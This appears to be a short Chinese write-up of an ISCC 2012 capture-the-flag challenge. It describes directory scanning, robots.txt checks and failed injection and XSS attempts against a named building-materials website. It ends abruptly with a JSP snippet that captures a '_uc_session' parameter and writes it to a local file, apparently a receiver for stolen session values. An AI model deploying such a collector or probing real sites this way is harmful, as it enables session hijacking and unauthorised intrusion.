ISCC 2012 真实关第二题

先抱怨一下，比赛网站移植的系统有很多功能不能正常使用，推荐使用原网站http://bitaec.com/进行测试。

第二关是对一个建材网站的渗透测试，习惯性的拿出wwwscan一顿狂扫，只发现一个有价值的目录。http://bitaec.com/robots.txt

这是对网络爬虫的一些规则设置,爬虫会首先检查，网页根目录下有没有robots.txt，

可以置一些你不想让搜索引擎收录的页面，不然爬虫会浏览所有不被密码保护的页面。很多情况下，其中的信息会指明网站的敏感页面。

具体信息看这http://baike.baidu.com/view/1280732.htm。

不过这个网站中的robots.txt没有任何内容。

又尝试了基本的注入，未果。

这时发现有一个博客，可以留言，觉得有可能存在xss，尝试很久依旧，未果。

发现过滤了关键的标签，和一些标签中的关键变量。

<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@ page import="java.io.*"%><%@ page import="java.net.URL"%><%@ page import="java.net.HttpURLConnection"%><%response.setContentType("text/html;charset=UTF-8");response.setStatus(HttpServletResponse.SC_MOVED_PERMANENTLY);response.setHeader("Pragma","No-Cache");         response.setHeader("Cache-Control","No-Cache");         response.setDateHeader("Expires",   0); String _uc_session="";_uc_session=(String)request.getParameter("_uc_session");out.println("_uc_session:"+_uc_session);try{File f = new File("c://temp.txt");if(!f.exists())f.createNewFile();BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));bw.append("_uc_session:"+_uc_session);bw.close();}catch(Exception e){out.println(e.getMessage());}%>